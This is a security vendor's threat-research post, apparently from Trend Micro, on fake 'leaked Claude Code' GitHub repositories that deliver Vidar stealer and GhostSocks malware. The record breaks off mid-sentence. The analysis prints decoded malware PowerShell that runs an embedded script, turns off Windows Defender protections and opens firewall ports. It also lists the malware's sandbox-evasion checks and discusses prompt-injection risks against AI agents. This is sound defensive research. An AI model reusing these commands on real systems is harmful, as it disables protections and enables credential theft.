{
	"id": "cfdd0859-3dee-426a-87fc-fc2f9b8eb287",
	"created_at": "2026-05-06T02:02:17.955186Z",
	"updated_at": "2026-05-06T02:03:52.759028Z",
	"deleted_at": null,
	"sha1_hash": "7c2d866aac3a558ae228733c723c48da8260718c",
	"title": "Weaponizing Trust Signals: Claude Code Lures and GitHub Release Payloads",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 758096,
	"plain_text": "Weaponizing Trust Signals: Claude Code Lures and GitHub\r\nRelease Payloads\r\nPublished: 2026-04-03 · Archived: 2026-05-06 02:01:49 UTC\r\nKey takeaways\r\nAnthropic inadvertently exposed internal Claude Code source material via a misconfigured npm package,\r\nwhich included approximately 512,000 lines of internal TypeScript and triggering rapid mirroring across\r\nGitHub.\r\nWithin 24 hours, threat actors took advantage of the attention around the leak, to distribute Vidar stealer\r\nand GhostSocks proxy malware through fake “leaked Claude Code” GitHub repositories.\r\nThe Claude Code bait is part of a broader rotating lure operation active since February 2026, impersonating\r\nmore than 25 software brands while delivering the same Rust-compiled infostealer payload.\r\nThe campaign abuses GitHub Releases as a trusted malware delivery channel, using large trojanized\r\narchives and disposable accounts to repeatedly evade takedowns.\r\nBeyond serving as a lure, the leaked source code itself introduces longer-term risks including vulnerability\r\ndiscovery, prompt injection blueprinting, and agentic attack surface exposure.\r\nOrganizations should only approve designated installation paths for AI developer tools and should actively\r\ndetect and block malicious indicators.\r\nOrganizations should also consider applying governance as a control plane for agentic risk. This incident\r\nsignifies that security compromise doesn't always come from software vulnerabilities: it can also come\r\nfrom human and organizational gaps. 
That's why TrendAI™ is introducing Agentic Governance Gateway\r\nto empower organizations to discover, observe, understand, detect, and enforce governance over agentic AI\r\nbehaviors to ensure safe and reliable adoption of autonomous AI.\r\nTrendAI Vision One™ detects and blocks the indicators of compromise (IOCs) outlined in this blog, and\r\nprovides customers with tailored threat hunting queries, threat insights, and intelligence reports. Customers\r\ncan also leverage Observed Attack Techniques (OAT) to hunt for suspicious activity associated with this\r\nthreat, and are protected by advanced pattern, behavior-monitoring, and signature-based detections.\r\nIn late March 2026, Anthropic inadvertently released the internal Claude Code source material\r\nas part of an npm package that included a large internal source map file. Although the incident stemmed from a\r\nsimple packaging mistake, threat actors were quick to capitalize on the resulting attention. Only 24 hours after the\r\nleak, they were able to create fake GitHub repositories to distribute credential-stealing malware disguised as\r\n“leaked” Claude Code downloads.\r\nThis incident demonstrates that security compromise is not limited to software vulnerabilities: human factors and\r\norganizational control gaps often serve as catalysts for threats and are primary drivers of material impact. 
In this\r\nblog entry, we will talk about our analysis of the threats capitalizing on this incident, the downstream risks of the\r\nleaked source code, and the actions organizations should take next.\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 1 of 21\n\nThe Claude Code source leak\r\nOn March 31, 2026, a routine npm publish for Anthropic's @anthropic-ai/claude-code package (version 2.1.88)\r\ninadvertently included a file that should never have shipped: cli.js.map, a 59.8 MB JavaScript source map\r\ngenerated by the Bun bundler. This file’s embedded sourcesContent field exposed the complete original\r\nTypeScript source tree—approximately 512,000 lines of code across 1,900 files—corresponding to build artifacts\r\nhosted on a publicly accessible Cloudflare R2 storage bucket.\r\nThe exposure was not a sophisticated breach, but a packaging error. The project's .npmignore file failed to\r\nexclude .map files from the distribution. Because Bun generates full source maps by default, without an explicit\r\nexclusion rule, the entire agentic harness powering Claude Code was also shipped out and laid bare to anyone who\r\nran npm install.\r\nWithin hours, the leaked source was mirrored across thousands of GitHub repositories. Anthropic confirmed the\r\nincident stemmed from human error, pulled the affected package version, and issued DMCA takedown notices\r\nagainst the mirrors. 
The company assured that no customer data or credentials were exposed.\r\nThis marked the second major Anthropic source-exposure incident in two months, following the “Mythos” leak, which also happened in late March and revealed internal details about an unreleased powerful AI\r\nmodel intended for cybersecurity use cases.\r\nAttack timeline\r\nBefore this leak, threat actors had been running AI-themed malware lures since at least February 2026, cycling\r\nthrough fake tools and repositories to attract developer interest. The Claude Code source leak on March 31\r\nprovided a convenient, high-profile, and timely lure. This enabled operators to rapidly repurpose their\r\nalready existing infrastructure. By April 1, within 24 hours of the leak, they pivoted to impersonating “leaked”\r\nClaude Code downloads, using the incident’s visibility to accelerate distribution of their infostealer payloads. \r\nDate | Incident | Description | Key details\r\nFebruary 2026 | AI tool lures | Malware campaign using fake AI tools | TradeAI.exe; 18+ unique samples; Copilot, Cursor, AI tools; Active campaign\r\nMarch 31, 2026 | Source code leak | Accidental exposure of source code | Anthropic npm packaging error; 59.8 MB source map exposed; 512K lines TypeScript\r\nMarch 31 to April 1, 2026 | Time window | Delay between leak and weaponization | Within 24 hours of the leak\r\nApril 1, 2026 | Claude Code lure | Malware distribution under fake Claude tooling | ClaudeCode_x64.7z; ClaudeCode_x64.exe; Vidar v18.7 + GhostSocks; GitHub Releases delivery\r\nTable 1. 
The campaign timeline\r\nWhat the source code revealed\r\nThe leaked codebase exposed several unreleased features and internal mechanisms:\r\nKAIROS: A persistent, always-running autonomous daemon mode enabling Claude Code to operate as a\r\nbackground agent that proactively acts on things it notices, with a 15-second blocking budget per cycle.\r\nUndercover Mode: A module (undercover.ts) that prevents the AI from accidentally revealing internal\r\ninformation, such as internal model codenames and Anthropic internals, when staff contribute to public\r\nrepositories.\r\nDream System: A background memory-consolidation engine (autoDream) that runs a reflective pass over\r\nproject-specific memory files during idle periods via a forked subagent, reorganizing and optimizing stored\r\ncontext.\r\nAnti-Distillation: Protective mechanisms (ANTI_DISTILLATION_CC) that inject fake tool definitions and\r\napply cryptographic signatures to prevent competitors from training on API traffic.\r\nModel codenames: References to upcoming models, including Capybara (a new model with a 1M context\r\nwindow), Fennec (Opus 4.6), and Tengu (the project's internal codename). The source also references Opus\r\n4.7 and Sonnet 4.8.\r\nBuddy Pet: A hidden Tamagotchi-style pet system with a deterministic gacha mechanic spanning 18\r\nspecies, five RPG-like stats (i.e., debugging, patience, chaos, wisdom, and snark) and 1% shiny variants\r\nthat respond to user coding activity.\r\nClaude Code: One lure in a larger campaign\r\nThreat actors did not need the source code itself. 
They needed the hype.\r\nWithin 24 hours of the leak making headlines, malicious GitHub repositories began appearing in\r\nsearch results—and near the top of Google results—for queries like “leaked Claude Code source” and “Claude\r\nCode download.” These repositories relied on familiar social engineering tactics, including READMEs promising\r\n“leaked source code” and “unlocked enterprise features,” fake download buttons embedded as images, and GitHub\r\nReleases hosting trojanized 7z archives.\r\nThe Claude Code bait, however, was only the latest chapter in a much broader operation. Similar GitHub‑hosted\r\nlure campaigns earlier this year abused fake AI tooling repositories to distribute Vidar‑class infostealers and\r\nGhostSocks proxy malware, as previously documented by Huntress. Our observations suggest\r\nthat the same threat actors have likely been running a rotating-lure campaign dating back to\r\nFebruary 2026, cycling through more than 25 distinct software brands to attract victims. Regardless of the name\r\non the label or the branding, every archive delivers the same thing: a Rust-compiled dropper, TradeAI.exe, which\r\ndeploys Vidar stealer alongside the GhostSocks proxy malware.\r\nA rotating carousel of lures\r\nThe operation's scale becomes apparent when examining the parent archives that contain the TradeAI.exe payload.\r\nAcross 22 unique payload variants, we identified 38 distinct 7z archives—each branded as a different piece of\r\npopular software.\r\nThe lure themes fall into several categories that reveal the operators' targeting strategy:\r\nAI and LLM tools make up the largest cluster, capitalizing on the surge of interest in generative AI. 
The\r\ncampaign impersonates well-known names like Claude Code itself (packaged\r\nas ClaudeCode_x64.7z and claude-cowork-win-x64.7z), references to specific model versions (opus-4-6-x64.7z), and GitHub Copilot (CopilotCowork_x64.7z). It also mimics lesser-known or fictional AI brands,\r\nnamely KawaiiGPT_x64.7z, WormGPT_x64.7z, NemoClaw_x64.7z (styled as an NVIDIA\r\nproduct), SimpleClaw_x64.7z, clawdbot_x64.7z, nanobot_x64.7z, and OpenClaw_x64.7z. The naming is\r\ndeliberate to entice victims, wherein some sound like legitimate open-source projects, while others like\r\n“WormGPT” exploit curiosity around underground AI tools.\r\nCryptocurrency and trading tools form the second major theme. Archives named hyperliquid-bot_x64.7z and bbg_free_x64.7z (mimicking Bloomberg Terminal) target the finance and crypto\r\ncommunity, which is a demographic with high-value credentials and wallet data that makes them an attractive\r\ntarget for infostealer campaigns.\r\nCreative and media tools round out the lure portfolio. The operators impersonate voice modification\r\nsoftware (voicemod_x64.7z), AI video generation tools (seedance_x64.7z, LTX-2.3_x64.7z, SoraRemover_x64.7z), and image generation tools (Z_image_x64.7z). These lures target\r\ncontent creators and artists who may be less security-conscious about software sourced from GitHub.\r\nUtility software provides additional coverage, with lures masquerading as YouTube_Downloader_x64.7z,\r\nOrcaSlicer_x64.7z (a 3D printing slicer), iRemovalPro_x64.7z (an iPhone unlocking tool), and\r\nperplexity_computer_x64.7z (impersonating the Perplexity AI search assistant). Each targets a different\r\nuser demographic, broadening the campaign's reach.\r\nOne pattern is consistent across all lures: a throwaway GitHub account creates a repository with a plausible name,\r\npopulates it with a minimal README, and hosts a trojanized 7z archive as a GitHub Release asset. 
The archives\r\nrange from 78 to 167 MB, large enough to appear legitimate and to evade some automated scanning systems. Once\r\na repository is flagged and removed, the operators simply create a new account and repeat the process with a\r\ndifferent lure name.\r\nConfirmed distribution repositories\r\nOur scanner identified 104 repositories created within seven days of the Claude\r\nCode leak using related keywords. Of these, two were confirmed to distribute malicious payloads via GitHub\r\nReleases:\r\nleaked-claude-code/leaked-claude-code: distributes ClaudeCode_x64.7z\r\nmy3jie/leaked-claude-code: repository-based delivery\r\nRelated network data confirmed six additional GitHub distribution URLs used by the broader campaign before the\r\nClaude Code pivot:\r\ngithub[.]com/Kawaii-GPT-ai/KawaiiGPT/releases/: KawaiiGPT lure\r\ngithub[.]com/ai-wormGPT/wormGPT/releases/: WormGPT lure\r\ngithub[.]com/claude-ai-opus-4-6/claude-opus-4.6/releases/: Claude Opus 4.6 lure\r\ngithub[.]com/realtime-voice-changer-app/realtime-voice-changer/releases/: Voicemod lure\r\ngithub[.]com/LTX-desktop/LTX-2.3/releases/: LTX video editor lure\r\ngithub[.]com/nvidia-nemoclaw/NemoClaw/releases/: NVIDIA NemoClaw lure\r\nKnown threat actor accounts include idbzoomh (taken down by GitHub), idbzoomh1, and my3jie. The accounts\r\nare disposable, as operators demonstrate no attachment to any single identity or lure theme.\r\nInfection chain\r\nThe infection chain is consistent across all lure variants:\r\n1. Discovery: The victim searches for a trending software tool on Google or GitHub. For the Claude Code\r\nvariant, queries like \"leaked Claude Code source\" and \"Claude Code download\" surface the malicious\r\nrepositories.\r\n2. 
Lure: The victim lands on a convincing GitHub repository with a README promising free access, leaked\r\nfeatures, or cracked versions.\r\n3. Download: The victim downloads a 7z archive (78–167 MB) from GitHub Releases. The archive name\r\nmatches the lure theme.\r\n4. Extraction: Inside the archive is TradeAI.exe, a Rust-compiled dropper binary. In the Claude Code variants,\r\nthe executable is renamed to ClaudeCode_x64.exe or similar.\r\n5. Execution: The dropper deploys two payloads:\r\nVidar Stealer (v18.7): An information stealer performing multi-threaded data theft of browser credentials,\r\ncryptocurrency wallets, session tokens, and system information.\r\nGhostSocks: A SOCKS5 proxy tool that tunnels network traffic through the victim's machine, enabling the\r\noperators to use compromised hosts as residential proxies.\r\n6. C\u0026C resolution: Vidar uses dead drop resolvers, which are a Steam Community profile and a Telegram\r\nchannel, to retrieve the active C\u0026C address, making infrastructure takedowns more difficult.\r\n7. Exfiltration: Stolen data is packaged and sent to the Vidar C\u0026C server.\r\nTechnical analysis of the dropper payload\r\nWith the delivery method established, we focused on the malware itself. Static analysis of the Rust-compiled\r\ndropper distributed across the campaign's lure archives shows that, regardless of branding, the payload remains\r\nfundamentally the same. Although it appears under multiple filenames, such as ClaudeCode_x64.exe,\r\nTradeAI.exe, and other brand-name variants, the underlying binary is functionally identical across samples. 
It is a\r\npurpose-built loader that masquerades as a graphics driver updater and relies on XOR-encrypted strings with a 12-byte rotating key to conceal C\u0026C URLs, staging paths, and exfiltration endpoints.\r\nBefore executing any payload logic, the dropper implements anti-analysis checks. It enumerates the local\r\nenvironment against hardcoded sandbox usernames, hostnames, processes, and bot farm patterns, terminating\r\nsilently if an analysis environment is detected. This evasion strategy, combined with Rust compilation, which\r\nproduces binaries inherently harder to reverse-engineer, contributes to the campaign's persistently low detection\r\nrates across vendors.\r\nString encryption\r\nAll sensitive strings in the binary are encrypted using a simple XOR cipher with a 12-byte rotating key. At\r\nruntime, the malware attempts to load the decryption key from the environment variable cryptify_keyd3d; if the\r\nvariable is not set, it falls back to the hardcoded default xnasff3wcedj.\r\nThe use of an environment variable (cryptify_keyd3d) for the XOR key suggests some flexibility, as it enables the\r\nmalware author to deploy variants with different keys or allow operators to customize decryption without\r\nrecompiling.\r\nIt uses the following decryption routine:\r\nChecks environment variable cryptify_keyd3d for custom key\r\nDefaults to hardcoded xnasff3wcedj (12 bytes)\r\nXOR each byte of the ciphertext with the key byte at index % 12\r\nReturns the resulting UTF-8 string\r\nListed here are the decrypted C\u0026C URLs:\r\nPrimary driver list URL: hxxps[://]pastebin[.]com/raw/mcwWi1Ue\r\nBackup driver list URL: hxxps[://]snippet[.]host/efguhk/raw\r\nEntry point and anti-analysis\r\nThe malware's entry point immediately establishes stealth by hiding the console window through a sequence of\r\nAPI calls: 
GetConsoleWindow(), ShowWindow(SW_HIDE), and FreeConsole(). This prevents users from\r\nnoticing the command window that would otherwise appear during execution.\r\nFollowing initialization, command-line arguments are parsed to determine the execution path. The malware\r\nsupports multiple modes including \"gui-only\" for displaying just the fake installer, \"no-gui-at\" for background-only operation, and \"runas-elevated\" for administrative execution.\r\nThe malware supports several command-line arguments to control execution behavior:\r\nArgument | Purpose\r\n--gui-only | Display GUI interface only (driver updater facade)\r\n--no-gui | Run downloader without GUI (silent background mode)\r\n--elevated | Post-UAC execution path (called after privilege escalation)\r\n--attempt=driver-update | Retry counter for elevation attempts\r\nTable 2. Accepted command-line arguments\r\nAnti-analysis checks\r\nBefore executing its payload, the dropper evaluates its environment for signs of sandboxing, virtualization, or\r\nanalysis. 
If these are detected, it terminates silently to avoid exposure.\r\nVirtual machine detection\r\nThe anti-analysis function implements multi-layered VM detection checking registry keys, processes, drivers,\r\nhardware identifiers, and network configuration:\r\nTechnique | Method | Indicators checked\r\nRegistry Keys | RegOpenKeyExW / RegQueryValueExW | VMware Tools, VirtualBox Guest Additions paths\r\nProcess Enumeration | CreateToolhelp32Snapshot | vmtoolsd.exe, vmwaretray.exe, vboxservice.exe, vboxtray.exe\r\nDriver Files | File existence checks | VBoxGuest.sys, vmhgfs.sys, vmmouse.sys, VBoxMouse.sys\r\nMAC Prefixes | Network adapter enumeration | 08:00:27 (VirtualBox), 00:15:5D (Hyper-V), 52:54:00 (QEMU)\r\nGPU Adapters | Display adapter name | vmware svga, \"virtualbox graphics\", \"hyper-v video\"\r\nBIOS Strings | System firmware checks | seabios, \"bochs\", \"qemu\", \"hyper-v\", \"vmware\", \"vbox\"\r\nNetwork IP | IP address check | 10.0.2.15 (VirtualBox default NAT)\r\nTable 3. Artifacts checked for VM detection\r\nIt also checks the following virtual machine-related artifacts:\r\nVM BIOS/Motherboard Strings:\r\nseabios\r\nbochs\r\nqemu\r\nvrtual\r\nhyper-v\r\nvmware\r\ngoogle\r\nvbox\r\ninnotek\r\nvirtual\r\nVM Driver Files:\r\nvmmouse.sys\r\nvmhgfs.sys\r\nVBoxMouse.sys\r\nVBoxGuest.sys\r\nVBoxSF.sys\r\nVBoxVideo.sys\r\nMAC Prefix | Associated VM\r\n08:00:27 | VirtualBox\r\n00:15:5D | Hyper-V\r\n52:54:00 | QEMU/KVM\r\n00:23:45 | VirtualBox (alternate)\r\nTable 4. 
VM MAC Prefixes\r\nSandbox evasion\r\nBeyond VM detection, the malware implements extensive sandbox-specific evasion using comprehensive\r\nblacklists targeting known analysis environments, research usernames, and sandbox hostname patterns:\r\nBlacklisted usernames:\r\nmalware\r\nvirus\r\nsandbox\r\nsand box\r\nwdagutilityaccount\r\nbruno\r\nsample\r\nmaltest\r\ncurrentuser\r\njz\r\ndekker\r\nJanet Van Dyne\r\nHarry Johnson\r\ntim\r\nJohn\r\nBlacklisted Hostnames:\r\nWasp\r\nDESK-IVRUUH4Y14\r\nMARS\r\nAMAZING-AVOCADO\r\nBIOS serials:\r\nSerial | Associated environment\r\nete9t8e8t3 | Windows Defender Application Guard (WDAG)\r\nH6MBDR4 | Trellix / FireEye sandboxes\r\n0311-3550-2146-3025-5233-5781-38 | Analysis environment\r\n0 | Default/missing BIOS serial\r\n1234567890 | Common VM placeholder\r\nTable 5. Serial numbers checked for VM detection\r\nDatacenter CPU:\r\nXeon\r\nEPYC\r\nMotherboard Manufacturer Blacklist:\r\nVirtualBox\r\nGoogle Compute Engine\r\nVirtual Machine\r\nSandbox DLLs:\r\ncuckoomon.dll\r\nSbieDll.dll\r\nSxIn.dll\r\ncmdvrt32.dll\r\ncmdvrt64.dll\r\nSandbox Hostname Patterns:\r\nOeslmdig\r\nBkismujm\r\nCgpslqmr\r\nDhrtnpns\r\nEkuuoqot\r\nFlvvprpu\r\nGmwwqsqv\r\nHnxxrtrw\r\nIoyysssx\r\nJpzzttty\r\nKqaauuuz\r\nLrbbvvva\r\nMsccwwwb\r\nNtddxxxc\r\nOueeyyyd\r\nPvffzzze\r\nRegex matching the pattern ^zds_fedr_ol_client_\\d+$\r\nDebugger and analysis tool detection\r\nIn addition to environment checks, the malware enumerates running processes to identify debuggers and analysis\r\ntools.\r\nBlacklisted 
processes:\r\nollydbg.exe\r\nx32dbg.exe\r\nx64dbg.exe\r\nwindbg.exe\r\nida.exe\r\nida64.exe\r\nprocesshacker.exe\r\nprocexp.exe\r\nprocexp64.exe\r\nwireshark.exe\r\nfiddler.exe\r\ncharles.exe\r\nsandboxie.exe\r\nvmtoolsd.exe\r\nvmwaretray.exe\r\nvmwareuser.exe\r\nvboxservice.exe\r\nvboxtray.exe\r\nPayload storage and extraction\r\nThe malware contains an embedded PowerShell payload that is XOR-encoded within the binary. The encoded data\r\nresides in the .data section and is decoded at runtime before execution. Additionally, the malware can download\r\npayloads from its C\u0026C infrastructure.\r\nThe embedded payload uses a two-layer encoding scheme. First, the data is XOR-encoded with key 44. The result\r\nis then Base64-encoded for storage. At runtime, the malware reverses this process:\r\n# Embedded XOR-encoded PowerShell payload\r\n$uowuunxT = 'CFwdDBEMC28WcHlfSV5fCyYIXB4MEQwOCElCWhZ4aWF8...'\r\n$uMoRdtBr = [System.Convert]::FromBase64String($uowuunxT)\r\n$wsCDOjzN = 44  # XOR key\r\n$swGGrVXi = [byte[]]@()\r\nforeach ($b in $uMoRdtBr) {\r\n    $swGGrVXi += $b -bxor $wsCDOjzN\r\n}\r\n$GCdKMnvk = [System.Text.Encoding]::UTF8.GetString($swGGrVXi)\r\n\u0026 ([ScriptBlock]::Create($GCdKMnvk))\r\nAfter XOR decryption with key 44 (0x2C), the payload reveals significant Windows Defender evasion and\r\nfirewall manipulation capabilities. 
The decrypted script systematically disables security controls to enable follow-on payloads to execute without interference.\r\nThe payload adds exclusions for common malware drop locations and prevents the scanning of PowerShell\r\nprocesses:\r\n# Path exclusions added by the decrypted payload\r\n$paths = @(\r\n    'C:\\Users',           # User profile directories\r\n    \"$env:TEMP\",          # Temporary files directory\r\n    'C:\\ProgramData',     # Application data\r\n    'C:\\OneDriveTemp',    # OneDrive temporary storage\r\n    'C:\\Users\\Public',    # Public user folder\r\n    'C:\\Windows'          # Windows system directory\r\n)\r\nforeach ($item in $paths) {\r\n    Add-MpPreference -ExclusionPath '$item'\r\n}\r\n# Process exclusions - prevents scanning of PowerShell\r\nAdd-MpPreference -ExclusionProcess 'powershell.exe'\r\nAdd-MpPreference -ExclusionProcess 'pwsh.exe'\r\nThe payload systematically disables multiple Defender protection features:\r\nFeature | Command | Impact\r\nMAPS Reporting | -MAPSReporting 0 | Disables cloud-based telemetry to Microsoft\r\nBlock at First Seen | -DisableBlockAtFirstSeen $true | Disables cloud-based threat blocking\r\nSample Submission | -SubmitSamplesConsent NeverSend | Prevents automatic sample uploads\r\nCloud Block Level | -CloudBlockLevel 0 | Disables cloud protection level\r\nPUA Protection | -PUAProtection disable | Disables potentially unwanted app detection\r\nIOAV Protection | -DisableIOAVProtection $true | Disables scanning of downloaded files\r\nBehavior Monitoring | -DisableBehaviorMonitoring $true | Disables real-time behavior analysis\r\nTable 6. 
Windows Defender security features disabled by the payload\r\nThe payload also opens inbound TCP ports for C\u0026C communication:\r\n# Firewall rules created by the decrypted payload\r\n$ports = @(57001, 57002, 56001)\r\nforeach ($port in $ports) {\r\n    New-NetFirewallRule -DisplayName \"Port $port TCP\" `\r\n        -Direction Inbound `\r\n        -LocalPort $port `\r\n        -Protocol TCP `\r\n        -Action Allow `\r\n        -Enabled True\r\n}\r\nGPU hardware scoring system\r\nThe binary implements a sophisticated GPU scoring mechanism to prioritize targets. Each detected GPU type\r\nreceives a \"bonus\" score where lower absolute values indicate higher priority as a download target. This scoring\r\nsystem reveals that the malware specifically targets gaming PCs: likely for cryptocurrency mining, game credential\r\ntheft, or leveraging gaming GPU resources.\r\nGPU category | Detection strings | Score\r\nVirtual GPU | virtualbox, parallels, vmware svga, virtualbox graphics, hyper-v video, microsoft basic display adapter | REJECTED (sandbox)\r\nIntegrated Graphics | intel(r) uhd graphics, intel(r) iris, intel(r) hd graphics, amd radeon(tm) graphics | -60\r\nProfessional Card | quadro, radeon pro, rtx a | -80\r\nAMD Gaming Card | radeon rx 5, radeon rx 6, radeon rx 7 | -90\r\nModern AMD Gaming | Modern Radeon models | -120\r\nGaming Card (NVIDIA) | geforce rtx 2, geforce rtx 3, geforce rtx 4, geforce gtx 10, geforce gtx 16 | Highest priority\r\nBasic Display (local) | Fallback local display | Low priority\r\nBasic Display (RDP) | Remote desktop context | Deprioritized\r\nTable 7. 
GPU scoring mechanism\r\nNetwork communication\r\nThe malware implements resilient C\u0026C communication using the Rust request library with Tokio async runtime.\r\nIf the primary server is unreachable, it automatically switches to a backup URL. Each URL receives three\r\nconnection attempts with two-second delays between retries.\r\nThe downloader randomly selects from five hardcoded User-Agent strings to evade network-based detection:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36\r\nOnce C\u0026C communication is established, the binary collects and reports system information to the C\u0026C before\r\npayload delivery:\r\nField | Collection method\r\nUsername | Environment variable harvesting\r\nPublic IP | HTTP request to external IP service (encrypted URL at 0x140832BB0)\r\nTimestamp | System time\r\nApp Version | Hardcoded 1.3.12\r\nGPU Model | Registry enumeration of display adapters\r\nCPU Info | Registry key HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0, value ProcessorNameString\r\nCore Count | System processor information query\r\nDrive Info | Starting from C:\\\r\nTable 8. System information sent to the C\u0026C server\r\nThe malware follows this download and installation chain:\r\n1. 
Fetch driver list: HTTP GET to primary URL (pastebin[.]com/raw/mcwWi1Ue), falls back to backup\r\n(snippet[.]host/efguhk/raw)\r\n2. Parse URLs: Extracts driver download URLs from fetched content\r\n3. Download archive: Attempts download with up to 3 retries per URL (primary then backup), 2-second delay\r\nbetween retries\r\n4. Fetch password: Requests archive extraction password from C\u0026C server; falls back to hardcoded default if\r\nserver returns empty or fails\r\n5. Extract payload: Unpacks the password-protected archive containing the \"driver\" payload\r\n6. Execute payload: Runs extracted content, likely a secondary malware stage or cryptominer\r\nSecurity implications of the leaked source code\r\nWhile the immediate threat is the social engineering campaign delivering Vidar, the leaked source code itself\r\npresents a distinct and longer-lasting risk surface. Security experts have warned that access to approximately\r\n512,000 lines of production code from a frontier AI company opens several attack vectors that extend well beyond\r\nusing the leak as a lure.\r\nVulnerability research and exploitation\r\nWith full access to the codebase, both security researchers and threat actors can systematically audit the code for\r\nexploitable vulnerabilities. This concern materialized almost immediately. Within days of the leak, a critical\r\nvulnerability in Claude Code was publicly reported, demonstrating that the code is being\r\nactively analyzed.\r\nThe agentic nature of Claude Code makes this particularly concerning. Unlike a traditional application, Claude\r\nCode interacts with file systems, executes terminal commands, reads and writes files, and manages development\r\nenvironments. 
A vulnerability in the agentic harness could allow:\r\nArbitrary code execution through crafted inputs or project files\r\nData exfiltration from developer environments via manipulated tool calls\r\nPrivilege escalation through the tool permission system\r\nPrompt injection blueprint\r\nThe leaked source also reveals exactly how Claude Code constructs its system prompts, parses user instructions,\r\nhandles tool definitions, and enforces safety boundaries. This is effectively a blueprint for crafting targeted prompt\r\ninjections, with attackers knowing the precise wording, ordering, and structure of the safety instructions that\r\ngovern the model's behavior.\r\nThis knowledge could be used to bypass safety controls by understanding their exact implementation, craft inputs\r\nthat exploit parsing edge cases, and design adversarial inputs optimized for the specific prompt architecture.\r\nAnti-distillation and competitive intelligence\r\nThe ANTI_DISTILLATION_CC mechanisms revealed in the source code demonstrate Anthropic's approach to\r\npreventing competitors from training on Claude's API outputs. With the implementation details now public,\r\nadversaries have a roadmap for circumventing these protections. The cryptographic signatures and fake tool\r\ndefinitions used as canary traps are now visible and can be stripped or avoided.\r\nAgentic attack surface\r\nPerhaps the most significant long-term concern is the exposure of the complete “agentic harness,” which is the\r\nsystem that enables Claude Code to interact with real computing environments. 
The source code reveals how the model decides which tools to invoke and in what sequence; the permission model governing file system access, command execution, and network operations; the sandbox boundaries and how they are enforced; and the internal safety classifiers and their decision logic.\r\nAccess to this knowledge gives adversaries a significant advantage in designing attacks against organizations whose developers use Claude Code in their workflows.\r\nMITRE ATT\u0026CK TTPs\r\nTactic | Technique | ID | Description\r\nResource Development | Stage Capabilities: Upload Malware | T1608.001 | Malware hosted on GitHub Releases\r\nResource Development | Establish Accounts: Social Media Accounts | T1585.003 | Disposable GitHub accounts for distribution\r\nInitial Access | Phishing: Spearphishing Link | T1566.002 | Lure repositories with download links\r\nExecution | User Execution: Malicious File | T1204.002 | Victim executes trojanized dropper\r\nDefense Evasion | Obfuscated Files or Information | T1027 | Rust-compiled dropper binary\r\nDefense Evasion | Virtualization/Sandbox Evasion: System Checks | T1497.001 | Debug environment and user input checks\r\nCredential Access | Credentials from Password Stores | T1555 | Vidar steals browser credentials\r\nCollection | Data from Local System | T1005 | Cryptocurrency wallets and session tokens\r\nCommand and Control | Web Service: Dead Drop Resolver | T1102.001 | Steam/Telegram profiles for C2 resolution\r\nCommand and Control | Proxy: Multi-hop Proxy | T1090.003 | GhostSocks SOCKS5 proxy\r\nExfiltration | Exfiltration Over C2 Channel | T1041 | Data sent to Vidar C2\r\nTable 9. 
TTPs used in the campaign\r\nSecurity recommendations\r\nOrganizations can reduce the risk from this campaign by tightening controls around tool installation, validating software sources, and actively monitoring for malicious activity using the following measures.\r\n- Instruct developers to use verified sources only. Legitimate Claude Code is available only through official channels such as claude.ai/install.sh (macOS/Linux) or claude.ai/install.ps1 (Windows), and via Homebrew, WinGet, or the VS Code/JetBrains extensions. npm-based installation has been deprecated. Unofficial GitHub repositories offering precompiled or standalone installers should be treated as potentially malicious.\r\n- Treat GitHub Releases with scrutiny. The campaign abuses GitHub Releases as a trusted delivery mechanism. Large 7z archives (78–167 MB) hosted on newly created repositories with minimal commit history are a strong signal of abuse.\r\n- Block known infrastructure. Add the C\u0026C domains and IPs listed in the IOC section to network blocklists.\r\n- Monitor for infostealer indicators. Watch for credential dumping patterns, connections to Steam Community profiles and Telegram channels used as dead drop resolvers, and unusual SOCKS5 proxy activity.\r\n- Audit AI tool installations. Establish clear organizational policies for which AI coding tools are approved and how they should be installed. Maintain an allowlist of approved sources.\r\n- Enforce endpoint detection. Ensure endpoints have detections for Vidar stealer variants and Rust-compiled droppers. 
The malware's anti-sandbox behavior means static detection rules are especially important.\r\nConclusion: Governance is the control plane for agentic risk\r\nThis Claude Code leak incident demonstrates that security compromise is not limited to software vulnerabilities; it is frequently enabled by weaknesses in people and organizational processes, which often drive the highest impact.\r\nIn practice, threat actors did not need a zero-day in the leaked codebase: they leveraged attention, trust signals, and predictable user behavior to achieve execution and credential theft.\r\nThis pattern becomes more consequential as organizations adopt agentic AI. Agentic systems can plan, reason, and act across enterprise environments, invoking tools, accessing data, and triggering workflows. Because these systems operate through iterative, adaptive loops rather than fully deterministic execution paths, the outcomes can be difficult to predict, trace, or control.\r\nAccordingly, TrendAI™ is designing solutions as an Agents Governance Gateway, positioning governance as the control plane, rather than treating the problem as security alone. 
The objective is to give organizations the ability to discover and inventory agents, observe what they are doing, understand behavior and intent across tool and data interactions, detect unsafe or anomalous actions, and enforce policy so that autonomous capability can be adopted with measurable control and accountability.\r\nProactive security with TrendAI Vision One™\r\nTrendAI Vision One™ is the industry-leading AI cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection.\r\nUtilizing Observed Attack Techniques (OAT)\r\nTrendAI Vision One™ customers that use endpoint and server protection solutions may go into the Observed Attack Techniques section of the TrendAI Vision One™ console to look for suspicious activity that may indicate the detection of malicious behavior associated with this threat.\r\nPotential indicators include:\r\n- Execution of Claude with Leaked Version\r\n- Possible Claude Code Related File Download\r\n- AWS Claude Leak UserAgent\r\nPatterns, models, and signatures\r\nTrendAI Vision One™ solutions that utilize different pattern, behavior 